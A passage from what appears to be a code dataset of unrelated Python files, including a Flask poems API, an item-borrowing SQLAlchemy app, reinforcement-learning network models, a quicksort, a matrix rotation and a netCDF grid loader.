datum[\"user\"])\r\n bot = datum.get(\"bot\")\r\n try:\r\n clip_service.bulk_insert(data_source)\r\n bot.send_message(query=datum.get(\"query\"), num=len(data_source))\r\n except Exception as e:\r\n # TODO: 適切なignore処理を\r\n print(e)\r\n\r\n # 各並列処理間で1秒待機する\r\n time.sleep(TIME_SLEEP)\r\n\r\n\r\ndef main():\r\n \"\"\"現在時刻の前後30分以内のpublish_timingを持つユーザーを取得する\"\"\"\r\n users = []\r\n waiting_users = user_service.find_publish_timing_between(timing=TIMING)\r\n for user in waiting_users:\r\n datum = {}\r\n publish_to = user.publish_to # 通知の送信先\r\n # botの選択\r\n if publish_to == PublishTo.SLACK.value:\r\n bot = SlackBot()\r\n elif publish_to == PublishTo.LINE.value:\r\n bot = LineBot()\r\n elif publish_to == PublishTo.EMAIL.value:\r\n bot = EmailBot(user.email)\r\n elif publish_to == PublishTo.FACEBOOK.value:\r\n bot = FacebookBot()\r\n elif publish_to == PublishTo.TWITTER.value:\r\n bot = TwitterBot()\r\n elif publish_to == PublishTo.DISCORD.value:\r\n bot = DiscordBot()\r\n else:\r\n bot = EmailBot(user.email)\r\n\r\n queries = list(user.queries)\r\n datum[\"last_published_at\"] = user.last_published_at\r\n datum[\"query\"] = queries[0].query if len(queries) > 0 else None\r\n datum[\"bot\"] = bot\r\n datum[\"user\"] = user\r\n\r\n try:\r\n job(datum)\r\n user.last_published_at = datetime.datetime.now()\r\n except Exception as e:\r\n print(e)\r\n users.append(user)\r\n # 正常に通知が送れたら、last_published_atとupdated_atを更新する\r\n user_service.bulk_update(users)\r\n\r\n\r\ndef to_clips_model(clips, user):\r\n if not clips:\r\n return\r\n \"\"\"APIから取得した動画情報をClipsの辞書に変換する\"\"\"\r\n data_source = []\r\n for clip in clips:\r\n data = {\r\n \"clip_id\": clip[\"clip_id\"],\r\n \"user\": user,\r\n \"clip_title\": clip[\"clip_title\"],\r\n \"channel_id\": clip[\"channel_id\"],\r\n \"channel_title\": clip[\"channel_title\"],\r\n \"published_at\": clip[\"published_at\"],\r\n \"thumbnail_url\": clip[\"thumbnail\"],\r\n \"is_visited\": False,\r\n \"created_at\": datetime.datetime.now(),\r\n \"updated_at\": datetime.datetime.now(),\r\n }\r\n\r\n data_source.append(data)\r\n\r\n return data_source\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"31008909","text":"\"\"\"Shared constants for validation\"\"\"\n\nfrom pydantic import BaseModel\n\n\nclass MinMax(BaseModel):\n minimum: float\n 
maximum: float\n\n def contains(self, x: float) -> bool:\n return x > self.minimum and x < self.maximum\n\n\nclass BoundingBox(BaseModel):\n latitude: MinMax\n longitude: MinMax\n\n\nBOUNDING_BOX = BoundingBox(\n latitude=MinMax(\n minimum=-14.549,\n maximum=71.367,\n ),\n longitude=MinMax(\n minimum=-179.779,\n maximum=0.0,\n ),\n)\n","sub_path":"vaccine_feed_ingest/utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"44712850","text":"from typing import Iterator, List, Set, Tuple\n\nfrom parallelpipe import Stage, stage\n\nfrom gfw_pixetl import get_module_logger\nfrom gfw_pixetl.layers import RasterSrcLayer\nfrom gfw_pixetl.pipes import Pipe\nfrom gfw_pixetl.settings.globals import GLOBALS\nfrom gfw_pixetl.tiles import RasterSrcTile, Tile\n\nLOGGER = get_module_logger(__name__)\n\n\nclass RasterPipe(Pipe):\n def get_grid_tiles(self) -> Set[RasterSrcTile]: # type: ignore\n \"\"\"Seed all available tiles within given grid.\n\n Use 1x1 degree tiles covering all land area as starting point.\n Then see in which target grid cell it would fall. Remove\n duplicated grid cells.\n \"\"\"\n\n tiles: Set[RasterSrcTile] = set()\n for tile_id in self.grid.get_tile_ids():\n tiles.add(self._get_grid_tile(tile_id))\n\n # tile_ids = self.grid.get_tile_ids()\n #\n # with get_context(\"spawn\").Pool(processes=GLOBALS.num_processes) as pool:\n # tiles: Set[RasterSrcTile] = set(pool.map(self._get_grid_tile, tile_ids))\n\n tile_count: int = len(tiles)\n LOGGER.info(f\"Found {tile_count} tile(s) inside grid\")\n\n return tiles\n\n def _get_grid_tile(self, tile_id: str) -> RasterSrcTile:\n assert isinstance(self.layer, RasterSrcLayer)\n return RasterSrcTile(tile_id=tile_id, grid=self.grid, layer=self.layer)\n\n def create_tiles(\n self, overwrite: bool\n ) -> Tuple[List[Tile], List[Tile], List[Tile], List[Tile]]:\n \"\"\"Raster Pipe.\"\"\"\n\n LOGGER.info(\"Start Raster Pipe\")\n\n tiles = self.collect_tiles(overwrite=overwrite)\n\n GLOBALS.workers = max(self.tiles_to_process, 1)\n\n pipe = (\n tiles\n | Stage(self.transform).setup(workers=GLOBALS.workers)\n | self.upload_file\n | self.delete_work_dir\n )\n\n tiles, skipped_tiles, failed_tiles, existing_tiles = self._process_pipe(pipe)\n\n LOGGER.info(\"Finished Raster Pipe\")\n return tiles, skipped_tiles, failed_tiles, existing_tiles\n\n @staticmethod\n @stage(workers=GLOBALS.num_processes)\n def filter_src_tiles(tiles: Iterator[RasterSrcTile]) -> Iterator[RasterSrcTile]:\n \"\"\"Only process tiles which intersect with source raster.\"\"\"\n for tile in tiles:\n if tile.status == \"pending\" and not tile.within():\n LOGGER.info(\n f\"Tile {tile.tile_id} does not intersect with source raster - skip\"\n )\n tile.status = \"skipped (does not intersect)\"\n yield tile\n\n # We cannot use the @stage decorate here\n # but need to create a Stage instance directly in the pipe.\n # When using the decorator, number of workers get set during RasterPipe class instantiation\n # and cannot be changed afterwards anymore. 
The Stage class gives us more flexibility.\n @staticmethod\n def transform(tiles: Iterator[RasterSrcTile]) -> Iterator[RasterSrcTile]:\n \"\"\"Transform input raster to match new tile grid and projection.\"\"\"\n for tile in tiles:\n if tile.status == \"pending\" and not tile.transform():\n tile.status = \"skipped (has no data)\"\n LOGGER.info(f\"Tile {tile.tile_id} has no data - skip\")\n yield tile\n","sub_path":"gfw_pixetl/pipes/raster_pipe.py","file_name":"raster_pipe.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210353200","text":"\"\"\"\n In-place quicksort\n\"\"\"\n\ndef quicksort(lst, left, right):\n if left >= right:\n return\n slower=faster=left # two pointers: slow and fast\n privot=lst[right] # use the rightmost value as the pivot; move everything smaller than it to its left\n while faster < right:\n if lst[faster] < privot:\n lst[faster], lst[slower] = lst[slower], lst[faster]\n slower+=1\n faster+=1\n # after the loop, slower marks the pivot position, so swap the pivot into place\n lst[faster], lst[slower] = lst[slower], privot\n # recursively sort both sides of the pivot\n quicksort(lst, left, slower-1)\n quicksort(lst, slower+1, right)\n\n\n\ns = [10, 2,3,1,5,8,9, 10, 13, 10, 10]\nquicksort(s, 0, len(s)-1)\n\nprint(s)\n","sub_path":"算法/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98103317","text":"from flask import Flask, jsonify, request, abort\r\nfrom poemsDAO import poemsDAO\r\n\r\napp = Flask(__name__, static_url_path='', static_folder='.')\r\n\r\n#curl \"http://127.0.0.1:5000/poems\"\r\n@app.route('/poems')\r\ndef getAll():\r\n #print(\"in getall\")\r\n results = poemsDAO.getAll()\r\n return jsonify(results)\r\n\r\n#curl \"http://127.0.0.1:5000/poems/2\"\r\n@app.route('/poems/<int:id>')\r\ndef findById(id):\r\n foundpoems = poemsDAO.findByID(id)\r\n\r\n return jsonify(foundpoems)\r\n\r\n#curl -i -H \"Content-Type:application/json\" -X POST -d \"{\\\"Title\\\":\\\"hello\\\",\\\"Author\\\":\\\"someone\\\",\\\"Price\\\":123}\" http://127.0.0.1:5000/poems\r\n@app.route('/poems', methods=['POST'])\r\ndef create():\r\n \r\n if not request.json:\r\n abort(400)\r\n # other checking \r\n poems = {\r\n \"Title\": request.json['Title'],\r\n \"Author\": request.json['Author'],\r\n \"Price\": request.json['Price'],\r\n }\r\n values =(poems['Title'],poems['Author'],poems['Price'])\r\n newId = poemsDAO.create(values)\r\n poems['id'] = newId\r\n return jsonify(poems)\r\n\r\n#curl -i -H \"Content-Type:application/json\" -X PUT -d \"{\\\"Title\\\":\\\"hello\\\",\\\"Author\\\":\\\"someone\\\",\\\"Price\\\":123}\" http://127.0.0.1:5000/poems/1\r\n@app.route('/poems/<int:id>', methods=['PUT'])\r\ndef update(id):\r\n foundpoems = poemsDAO.findByID(id)\r\n if not foundpoems:\r\n abort(404)\r\n \r\n if not request.json:\r\n abort(400)\r\n reqJson = request.json\r\n if 'Price' in reqJson and type(reqJson['Price']) is not int:\r\n abort(400)\r\n\r\n if 'Title' in reqJson:\r\n foundpoems['Title'] = reqJson['Title']\r\n if 'Author' in reqJson:\r\n foundpoems['Author'] = reqJson['Author']\r\n if 'Price' in reqJson:\r\n foundpoems['Price'] = reqJson['Price']\r\n values = (foundpoems['Title'],foundpoems['Author'],foundpoems['Price'],foundpoems['id'])\r\n poemsDAO.update(values)\r\n return jsonify(foundpoems)\r\n \r\n\r\n \r\n\r\n@app.route('/poems/<int:id>' , methods=['DELETE'])\r\ndef delete(id):\r\n poemsDAO.delete(id)\r\n return jsonify({\"done\":True})\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n app.run(debug= 
True)","sub_path":"Project/serverPoems.py","file_name":"serverPoems.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"650209416","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nsys.setrecursionlimit(5000)\n\nN = int(sys.stdin.readline().rstrip())\n\nline = dict()\n\nfor j in range(N):\n a,b = tuple(map(int,sys.stdin.readline().rstrip().split()))\n try:\n line[a].append(b)\n except:\n line[a] = [b]\n try:\n line[b].append(a)\n except:\n line[b] = [a]\n\nvisit = [0 for i in range(N+1)]\n\nans = 0\npoint = 0\nchange = 0\n\ndef dfs(start,current,prev,visit):\n global ans,point,change\n next_line = line[current]\n for next in next_line:\n if next != prev:\n if visit[next] == -1 and next == start:\n ans = 1\n return\n elif visit[next] == -1 and next != start:\n ans = 2\n point = next\n return\n visit[next] = -1\n dfs(start,next,current,visit)\n if ans == 1:\n return\n elif ans == 2 and current == point and change == 0:\n change = 1\n return\n elif ans == 2 and current != point and change == 0:\n return\n elif change == 1:\n visit[current] = 0\n return\n visit[next] = 0\n\nvisit[1] = -1\ndfs(1,1,0,visit)\n\ndef dfs2(n,prev):\n if visit[n] !=0 and visit[n] != -1:\n return visit[n]\n\n next_line = line[n]\n min_ans = []\n if len(next_line) == 1 and next_line[0] == prev:\n return -5\n for next in next_line:\n if next != prev:\n if visit[next] == -1:\n min_ans.append(1)\n elif visit[next] != 0:\n min_ans.append(visit[next] + 1)\n else:\n ans = dfs2(next,n)\n if ans != -5:\n min_ans.append(ans+1)\n visit[n] = min(min_ans)\n return visit[n]\n\none_next = line[1]\n\none_count = 0\nfor o_n in one_next:\n if visit[o_n] == -1:\n one_count +=1\nif one_count < 2:\n visit[1] = 0\n\nfor n in range(1,N+1):\n if len(line[n]) == 1:\n dfs2(n,0)\n\nfor i in range(1,N+1):\n if visit[i] == -1:\n if i !=N:\n print(0,end=' ')\n else:\n print(0)\n else:\n if i!=N:\n print(visit[i],end=' ')\n else:\n print(visit[i])","sub_path":"서울 지하철 2호선!.py","file_name":"서울 지하철 2호선!.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"323727875","text":"\"\"\"A simple crud app to facilitate borrowing digital items\n (books, movies, music and possibly others between several users\"\"\"\nimport os\nimport warnings\n\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\ndb = SQLAlchemy(app)\n\n\nclass Item(db.Model):\n # This class has all entries for the items table\n # An item can be more than once, if more users have made it\n # available\n\n __tablename__ = 'items'\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The title of the item (book title, CD/record title, movie title)\n title = db.Column(db.String(64))\n\n # The description of the item (track listing for music, plot synopsis for\n # movie or book)\n description = db.Column(db.Text(64))\n\n # Whether the item is available or not (Probably don't need that.\n # If the borrower_id not None, then it is available)\n # available = db.Column(db.Boolean)\n\n # The category of the item ('movie', 'music', 'book')\n category = db.Column(db.String(64))\n\n # The author, artist/ band or director id\n 
artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'))\n\n # An object oriented view of the relationship between\n # an item and the user who owns it.\n # E.g. Given an instance of class Item, the owner\n # attribute gives its owner\n owns = db.relationship('Own', backref='owner', uselist=False)\n\n # An object oriented view of the relationship between\n # an item and the user who's borrowed it.\n # E.g. Given an instance of class Item, the lender\n # attribute gives its lender\n borrows = db.relationship('Borrow', backref='lender', uselist=False)\n\n def __repr__(self):\n return f'<{self.title}>'\n\n\nclass Artist(db.Model):\n # This class has all the entries for the artists table\n __tablename__ = 'artists'\n\n # The id of the artist\n id = db.Column(db.Integer, primary_key=True)\n\n # The first name of the artist\n first_name = db.Column(db.String(64))\n\n # The last name of the artist\n last_name = db.Column(db.String(64))\n\n\n # An object oriented view of the relationship between\n # an item and the artist who created it.\n # E.g. Given an instance of class Artist, the items\n # attribute gives the list of items associated with it.\n items = db.relationship('Item', backref='artist', lazy=\"dynamic\")\n\n def __repr__(self):\n return f'<{self.first_name} {self.last_name}>'\n\n\nclass Own(db.Model):\n # This class has all the entries for the users table\n __tablename__ = 'owns'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The name of the user that owns the item\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # The datetime when the item was registered by the user\n # datetime = db.Column(db.DateTime)\n\n # The id of the item being registered as available\n item_id = db.Column(db.String(64), db.ForeignKey('items.id'))\n\n def __repr__(self):\n return f'User with id {self.user_id} registered item with id {self.item_id}'\n\n\nclass Borrow(db.Model):\n # This class has all the entries for the borrowers table\n __tablename__ = 'borrows'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The name of the user that owns the item\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n # The datetime when the item was borrowed by the user\n # datetime = db.Column(db.DateTime)\n\n # The id of the item being borrowed\n item_id = db.Column(db.String(64), db.ForeignKey('items.id'))\n\n def __repr__(self):\n return f'User with id {self.user_id} borrowed item with id {self.item_id}'\n\n\nclass User(db.Model):\n # This class has all the entries for the users\n __tablename__ = 'users'\n\n # The primary key of the table\n id = db.Column(db.Integer, primary_key=True)\n\n # The username with which the user is registering\n username = db.Column(db.String(64), unique=True)\n\n # The user's first name\n first_name = db.Column(db.String(64))\n\n # The user's last name\n last_name = db.Column(db.String(64))\n\n # An object oriented view of the relationship between\n # a user and the items he owns.\n # E.g. Given an instance of class User, the owns\n # attribute gives the list of items it owns.\n owns = db.relationship('Own', backref='user')\n\n # An object oriented view of the relationship between\n # a user and the items he owns.\n # E.g. 
Given an instance of class User, the owns\n # attribute gives the list of items it's borrowed.\n borrows = db.relationship('Borrow', backref='user')\n\n def __repr__(self):\n return f'{self.username}'\n\n\nif __name__ == '__main__':\n # Example on how to create the several entries in the db\n\n # Create a user\n mia_maja = User(username=\"Mia_M\",\n first_name=\"Mia Maja\",\n last_name=\"Holst Manstrup\")\n\n # Create an item\n everyman = Item(title=\"Everyman\",\n description=\"The book begins at the funeral of \"\n \"its protagonist. The remainder of the \"\n \"book, which ends with his death, looks \"\n \"mournfully back on episodes from his life, \"\n \"including his childhood, where he and his\"\n \" older brother, Howie, worked in his father's\"\n \" shop, Everyman's Jewelry Store. He has been \"\n \"married three times, with two sons from his \"\n \"first marriage who resent him for leaving their \"\n \"mother, and one daughter from his second marriage \"\n \"who treats him with kindness and compassion, though \"\n \"he divorced her mother after beginning an affair \"\n \"with a 24-year-old Danish model, who subsequently \"\n \"became his third wife. Having divorced her as well, \"\n \"he has moved in his old age to a retirement community\"\n \" at the New Jersey shore, where he lives alone and \"\n \"attempts to paint, having passed up a career as an \"\n \"artist early in his life to work in advertising in \"\n \"order to support himself and his family. The book \"\n \"traces the protagonist's feelings as he gets \"\n \"increasingly old and sick, and his reflections of \"\n \"his own past, which has included his share of misdeeds \"\n \"and mistakes, as he ponders his impending death.\")\n\n # Create an artist\n philip_roth = Artist(first_name=\"Philip\", last_name=\"Roth\")\n\n # Assign the artist to the item\n everyman.artist = philip_roth\n\n # Assign a category to the item\n everyman.category = \"book\"\n\n # Assign an owner to the item\n everyman.owner = mia_maja\n\n # Create another user\n nikos_n = User(username=\"Nikos_N\",\n first_name=\"Nikos\",\n last_name=\"Nezeritis\")\n\n # Create another item\n white_nights = Item(title=\"White Nights\",\n description=\"The narrator describes his experience \"\n \"walking in the streets of St. Petersburg. \"\n \"He loves the city at night, and feels \"\n \"comfortable in it. He no longer feels \"\n \"comfortable during the day because all \"\n \"the people he is used to seeing are not there. \"\n \"He drew his emotions from them: if they were \"\n \"happy, he was happy; if they were despondent, \"\n \"he was despondent. New faces made him feel alone. 
\"\n \"As he walked, the houses would talk to him and tell \"\n \"him how they were being renovated or painted a new color \"\n \"or being torn down.\")\n # Create its artist\n fyodor_dostoevsky = Artist(first_name=\"Fyodor\", last_name=\"Dostoevsky\")\n\n # Assign the artist to the item\n white_nights.artist = fyodor_dostoevsky\n\n # Assign a category to the item\n white_nights.category = \"book\"\n\n # Assign an owner to the item\n white_nights.owner = nikos_n\n\n # One user borrows something from the other\n nikos_n.borrows = everyman\n\n # Add owner, artist and item to the db\n db.session.add_all([mia_maja, nikos_n, philip_roth, everyman])\n\n # Commit the db\n db.session.commit()\n\n # Query to see if every item, user and artist have the expected entries\n\n\n\n\n\n\n\n\n#class UserAction:\n \"\"\"\n A class that reads a User, an Action and an Item object\n and implements either a give, a return or a take action\n TODO: Re-write this as a function maybe\n \"\"\"\n # def __init__(self,\n # User: User,\n # Action: Action,\n # Item: Item,\n # type_of_action: str):\n # self.User = User\n # self.Action = Action\n # self.Item = Item\n # self.type_of_action = type_of_action\n\n #def act(self):\n # Action.action = self.type_of_action\n # Action.user_id = User.id\n # Action.item_id = Item.id\n\n # if self.type_of_action not in [\"give\", \"borrow\", \"return\"]:\n # raise ValueError(\"This action is not available\")\n # elif self.type_of_action == \"give\":\n # If the user wants to give this item, they should be added in\n # the item's owner_id entry\n # Item.owner_id = Action.user_id\n # elif self.type_of_action == \"borrow\":\n # If the user wants to borrow this item, they should be added in\n # the item's owner_id entry\n # if Item.owner_id == Action.user_id:\n # warnings.warn(\"You own this item already\")\n # else:\n # if Item.available:\n # Item.borrower_id = Action.user_id\n # else:\n # warnings.warn(\"This item is not available\")\n\n\n\n# A user cannot borrow more items of a certain category\n# than the closest number to half the items of this category they have\n# made available. If they attempt to do so, a warning should be issued\n# and the action shouldn't be allowed\n\n# We want to have a page with a log of all the actions that users did, with the respective\n# timesteps\n\n# We want to have separate pages for books, records, movies\n# For each item, the user can browse and see a picture of it and its synopsis\n\n# For the future: If a user keeps an item longer than they should, an email should be\n# sent to them.\n\n# Users should register using an html form\n\n# For the future: A user should also have the right to withdraw an item\n# If an item gets withdrawn, the whole row gets removed.\n# If it was borrowed and it gets returned, the borrower_id becomes None\n\n\n# In order for someone to become a borrower, they should first have\n# provided some item. 
So, we have to make sure that when a user wants to\n# borrow something, they are already owners of something else\n","sub_path":"item_borrowing.py","file_name":"item_borrowing.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"477455415","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom configs import *\nfrom lib import dqn_model, common\n\n\nclass BaseModel(nn.Module):\n def __init__(self, input_dim, output_dim):\n super(BaseModel, self).__init__()\n self.linear1 = nn.Linear(input_dim, 20)\n self.relu = nn.ReLU()\n self.linear2 = nn.Linear(20, output_dim)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n return self.linear2(x)\n\nclass Base_QR_DQN_Model(nn.Module):\n def __init__(self, input_dim, output_dim, n_quant):\n super(Base_QR_DQN_Model, self).__init__()\n self.n_quant = n_quant\n self.n_action = output_dim\n self.linear1 = nn.Linear(input_dim, 64)\n self.linear2 = nn.Linear(64, 32)\n self.relu = nn.ReLU()\n self.linear3 = nn.Linear(32, output_dim * n_quant)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n x= torch.tanh(self.linear2(x))\n return self.linear3(x).view(-1, self.n_action, self.n_quant)\n\nclass Noisy_QR_DQN_Model(nn.Module):\n def __init__(self, input_dim, output_dim, n_quant):\n super(Noisy_QR_DQN_Model, self).__init__()\n self.n_quant = n_quant\n self.n_action = output_dim\n self.linear1 = dqn_model.NoisyLinear(input_dim, 64)\n self.linear2 = dqn_model.NoisyLinear(64, 32)\n self.relu = nn.ReLU()\n self.linear3 = dqn_model.NoisyLinear(32, output_dim * n_quant)\n\n def forward(self, ob):\n x = self.relu(self.linear1(ob))\n x= torch.tanh(self.linear2(x))\n return self.linear3(x).view(-1, self.n_action, self.n_quant)\n\n\n\nclass RainbowDQN(nn.Module):\n def __init__(self, input_dim, output_dim):\n super(RainbowDQN, self).__init__()\n self.fc_val = nn.Sequential(\n dqn_model.NoisyLinear(input_dim, 256),\n nn.ReLU(),\n dqn_model.NoisyLinear(256, N_ATOMS)\n )\n self.fc_adv = nn.Sequential(\n dqn_model.NoisyLinear(input_dim, 256),\n nn.ReLU(),\n dqn_model.NoisyLinear(256, output_dim * N_ATOMS)\n )\n self.register_buffer(\"supports\", torch.arange(Vmin, Vmax + DELTA_Z, DELTA_Z))\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, x):\n batch_size = x.size()[0]\n val_out = self.fc_val(x).view(batch_size, 1, N_ATOMS)\n adv_out = self.fc_adv(x).view(batch_size, -1, N_ATOMS)\n adv_mean = adv_out.mean(dim=1, keepdim=True)\n return val_out + (adv_out - adv_mean)\n\n def both(self, x):\n cat_out = self(x)\n probs = self.apply_softmax(cat_out)\n weights = probs * self.supports\n res = weights.sum(dim=2)\n return cat_out, res\n\n def qvals(self, x):\n return self.both(x)[1]\n\n def apply_softmax(self, t):\n return self.softmax(t.view(-1, N_ATOMS)).view(t.size())\n\n\nclass FRAPModel(nn.Module):\n def __init__(self, relations):\n super(FRAPModel, self).__init__()\n self.demand_embedding = nn.Linear(2, 4)\n self.conv2d1 = nn.Conv2d(in_channels=8, out_channels=20, kernel_size=(1,1),stride=(1,1))\n self.relations = torch.tensor(relations) # (1, 8, 7)\n self.relation_embedding = nn.Embedding(2, 4)\n self.relation_conv2d = nn.Conv2d(in_channels=4, out_channels=20, kernel_size=(1,1), stride=(1,1))\n self.conv2d2 = nn.Conv2d(in_channels=20, out_channels=20, kernel_size=(1,1), stride=(1,1))\n self.conv2d3 = nn.Conv2d(in_channels=20, out_channels=1, kernel_size=(1,1), stride=(1,1))\n\n def forward(self, ob):\n 
'''\n :param ob: [bsz, 8, 2]\n :return: distribution of actions\n '''\n bsz = ob.shape[0]\n demands = self.demand_embedding(ob.reshape(-1, 2)).reshape(bsz, 8, 4)\n # demand: [bsz, 8, 4]\n pair_representation = torch.zeros([bsz, 8, 7, 8])\n for i, demand in enumerate(demands):\n # demand: [8, 4]\n for s in range(8):\n count = 0\n for k in range(8):\n if k == s: continue\n pair_representation[i][s][count] = torch.cat([demand[s], demand[k]])\n count += 1\n\n # pair_representation: (bsz, 8, 7, 8) -> (bsz, 8, 8, 7) --> x: (bsz, 20, 8, 7)\n x = self.conv2d1(pair_representation.permute(0, 3, 1, 2))\n\n # Phase competition mask\n phase_competition_mask = self.relation_embedding(self.relations).permute(0, 3, 1, 2) # (1, 4, 8, 7)\n phase_competition_mask = self.relation_conv2d(phase_competition_mask) # (1, 20, 8, 7)\n\n x = x * phase_competition_mask # (bsz, 20, 8, 7)\n x = self.conv2d2(x)\n x = self.conv2d3(x) # (bsz, 1, 8, 7)\n x = x.squeeze() # (bsz, 8, 7)\n x = torch.sum(x, dim=-1)\n return x\n\n\nclass CoLightModel(nn.Module):\n def __init__(self, input_dim, output_dim, agent_list=None):\n super(CoLightModel, self).__init__()\n self.observation_proj = nn.Linear(input_dim, 32)\n self.obs_inner_agent_proj = nn.Linear(32, 16)\n self.obs_outer_agent_proj = nn.Linear(32, 16)\n self.cooperation_proj = nn.Linear(16, 16)\n self.final_proj = nn.Linear(16, output_dim)\n\n def forward(self, obs):\n '''\n :param obs:\n \"ob_embedding\": embedding for current intersection observation, torch.tensor\n \"lane_vehicle_num\": no need to explain\n \"lane_vehicle_speed\": no need to explain\n \"adjacency\": the ob_embedding of adjacent intersections, torch.tensor\n :return: action\n '''\n\n print(\"obs:\", obs)\n\n inner_ob_embedding = self.obs_inner_agent_proj(obs['ob_embedding'])\n\n interaction_scores = []\n\n for adj_ob_embedding in obs['adjacency']:\n interaction_score = torch.dot(inner_ob_embedding.reshape(-1), self.obs_outer_agent_proj(adj_ob_embedding).reshape(-1))\n interaction_scores.append(interaction_score)\n interaction_scores = torch.stack(interaction_scores)\n interaction_scores = F.softmax(interaction_scores, dim=0)\n\n adj_ob_embeddings = torch.stack(obs['adjacency'])\n cooperation_adj = torch.sum(self.cooperation_proj(adj_ob_embeddings) * interaction_scores.unsqueeze(1), dim=0)\n return self.final_proj(cooperation_adj.unsqueeze(0))\n\n\n","sub_path":"agent_rainbow/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"364071706","text":"# https://leetcode-cn.com/problems/rotate-image/\r\n# Achieves a clockwise 90-degree rotation:\r\n# Flip: flip up and down across the horizontal midline (-180 degrees + one mirror)\r\n# Transpose: flip across the top-right to bottom-left diagonal (270 degrees + one mirror)\r\n\r\n\r\nclass Solution(object):\r\n def rotate(self, matrix):\r\n if len(matrix) == 0:\r\n return\r\n\r\n h = w = len(matrix) # h is the vertical size\r\n # Flip across the vertical center line\r\n for i in range(0, h):\r\n for j in range(int(w / 2)): # 3*3 array: int(w/2)=1, so only the j=0 pass runs\r\n # print(matrix[i][j], matrix[i][w-j-1]) # w = 3, j in range(2), w-j-1 = 1 and 2\r\n matrix[i][j], matrix[i][w - j - 1] = matrix[i][w - j -\r\n 1], matrix[i][j]\r\n\r\n # Flip across the bottom-left to top-right diagonal\r\n for i in range(h):\r\n for j in range(w - 1 - i):\r\n print(matrix[i][j], matrix[w - 1 - j][h - 1 - i], 'w-1-i =',\r\n w - 1 - i)\r\n matrix[i][j], matrix[w - 1 - j][h - 1 -\r\n i] = matrix[w - 1 -\r\n j][h - 1 -\r\n i], matrix[i][j]\r\n\r\n\r\nmatrix = [\r\n [1, 2, 3],\r\n [4, 5, 6],\r\n [7, 8, 9],\r\n]\r\n\r\n# step1\r\n# [3, 2, 1]\r\n# [6, 5, 4]\r\n# [9, 8, 7]\r\n\r\n# step2\r\n# 3 
7 w-1-i = 2\r\n# 2 4 w-1-i = 2\r\n# 6 8 w-1-i = 1\r\n\r\n# out\r\n# [7, 4, 1]\r\n# [8, 5, 2]\r\n# [9, 6, 3]\r\n\r\nSolution().rotate(matrix)\r\n","sub_path":"048-1-Rotate Image.py","file_name":"048-1-Rotate Image.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167445670","text":"# module load_grid\nimport netCDF4 as nc\n\nimport numpy as np\n#from scipy.interpolate.fitpack2 import SmoothBivariateSpline\n\n__version__ = '0.1'\n\ndef load_grid(files):\n\t'''\nload_grid returns a dictionary of netCDF4 variables. The actual extraction of the data in them from\nthe netCDF file must be done by the user, hopefully at the last minute, so as to reduce the amount\nof wasted memory.\n\t'''\n\tif files.__class__ == str:\n\t\tf = files\n\telif files.__class__ == list:\n\t\tf = files[0]\n\telse:\n\t\traise TypeError('wrong type sent to load_grid')\n\t\treturn False\n\t\n\tncf = nc.Dataset(f,mode='r')\n\t\n\tG = {}\n\tG['ncfile'] = ncf\n\tG['lon'] = ncf.variables['lon_rho']\n\tG['lat'] = ncf.variables['lat_rho']\n\tG['lonu'] = ncf.variables['lon_u']\n\tG['latu'] = ncf.variables['lat_u']\n\tG['lonv'] = ncf.variables['lon_v']\n\tG['latv'] = ncf.variables['lat_v']\n\tG['cs'] = ncf.variables['Cs_r']\n\tG['csw'] = ncf.variables['Cs_w']\n\t\n\tG['mask'] = ncf.variables['mask_rho']\n\tG['masku'] = ncf.variables['mask_u']\n\tG['maskv'] = ncf.variables['mask_v']\n\t\n\tG['H'] = ncf.variables['h']\n#\tG['Hu'] = griddata(G['lat'].reshape(G['lat'].size),G['lon'].reshape(G['lon'].size),G['H'].reshape(G['H'].size),G['latu'],G['lonu'])\n#\tG['Hv'] = griddata(G['lat'].reshape(G['lat'].size),G['lon'].reshape(G['lon'].size),G['H'].reshape(G['H'].size),G['latv'],G['lonv'])\n\treturn 